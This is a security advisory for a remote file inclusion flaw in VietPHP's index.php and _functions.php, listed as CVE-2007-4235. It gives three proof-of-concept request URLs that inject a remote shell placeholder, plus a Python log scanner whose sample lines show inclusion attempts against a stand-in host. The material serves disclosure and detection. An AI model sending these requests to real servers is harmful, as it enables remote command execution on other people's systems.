VietPHP contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to 'index.php' not properly sanitizing user input supplied to the 'language' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.
Currently, there are no known upgrades, patches, or workarounds available to correct this issue.
http://[target]/path/admin/index.php?language=Sh3LL
http://[target]/index.php??language=Sh3LL
http://[target]/_functions.php?dirpath=Sh3LL
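A log check for the request patterns listed above, as an added example that is not part of the original advisory: it flags requests where the `language` parameter of `index.php` or the `dirpath` parameter of `_functions.php` carries a URL scheme or a leading `//`. Common Log Format is assumed, and the log lines, addresses and host names are constructed.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Script -> parameter pairs named in the advisory.
WATCHED = {"index.php": "language", "_functions.php": "dirpath"}
# A value starting with a URL scheme ("http:", "ftp:", "php:") or "//" points off-host.
REMOTE = re.compile(r"^\s*(?:[a-z][a-z0-9+.\-]*:|//)", re.I)
# Request field of a Common Log Format line: "METHOD target PROTOCOL".
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample input (documentation address ranges, reserved .example names).
SAMPLE_LOG = [
    '192.0.2.10 - - [07/Aug/2007:10:00:01 +0000] "GET /index.php?language=english HTTP/1.1" 200 5120',
    '198.51.100.7 - - [07/Aug/2007:10:00:09 +0000] "GET /path/admin/index.php?language=http://files.example/inc.txt HTTP/1.1" 200 312',
    '198.51.100.7 - - [07/Aug/2007:10:00:12 +0000] "GET /index.php??language=ftp%3A%2F%2Ffiles.example%2Finc.txt HTTP/1.1" 200 312',
    '203.0.113.4 - - [07/Aug/2007:10:00:20 +0000] "GET /_functions.php?dirpath=//files.example/inc HTTP/1.1" 200 0',
    '192.0.2.10 - - [07/Aug/2007:10:00:31 +0000] "GET /news.php?language=http://files.example/x HTTP/1.1" 404 0',
]

def suspicious_params(target):
    """Return [(script, param, value)] for watched parameters holding an off-host reference."""
    parts = urlsplit(target)
    script = parts.path.rsplit("/", 1)[-1].lower()
    param = WATCHED.get(script)
    if param is None:
        return []
    hits = []
    # lstrip("?") tolerates the doubled "?" form; parse_qsl percent-decodes once.
    for name, value in parse_qsl(parts.query.lstrip("?"), keep_blank_values=True):
        value = unquote(value)  # second decode catches double-encoded values
        if name.lower() == param and REMOTE.match(value):
            hits.append((script, param, value))
    return hits

def scan(lines):
    """Yield (client_ip, (script, param, value)) for each suspicious request."""
    for line in lines:
        m = REQUEST.search(line)
        if m:
            for hit in suspicious_params(m.group(1)):
                yield line.split()[0], hit

if __name__ == "__main__":
    for ip, hit in scan(SAMPLE_LOG):
        print(ip, hit)
```

Parameters sent in a POST body do not appear in access logs, so this check only covers values passed in the query string.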
Vendor URL: http://www.vietphp.info/
Related OSVDB ID: 39207
Related OSVDB ID: 39208
Related OSVDB ID: 39209
Other Advisory URL: http://securityreason.com/securityalert/2983
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-08/0089.html
ISS X-Force ID: 35846
CVE-2007-4235
Bugtraq ID: 25226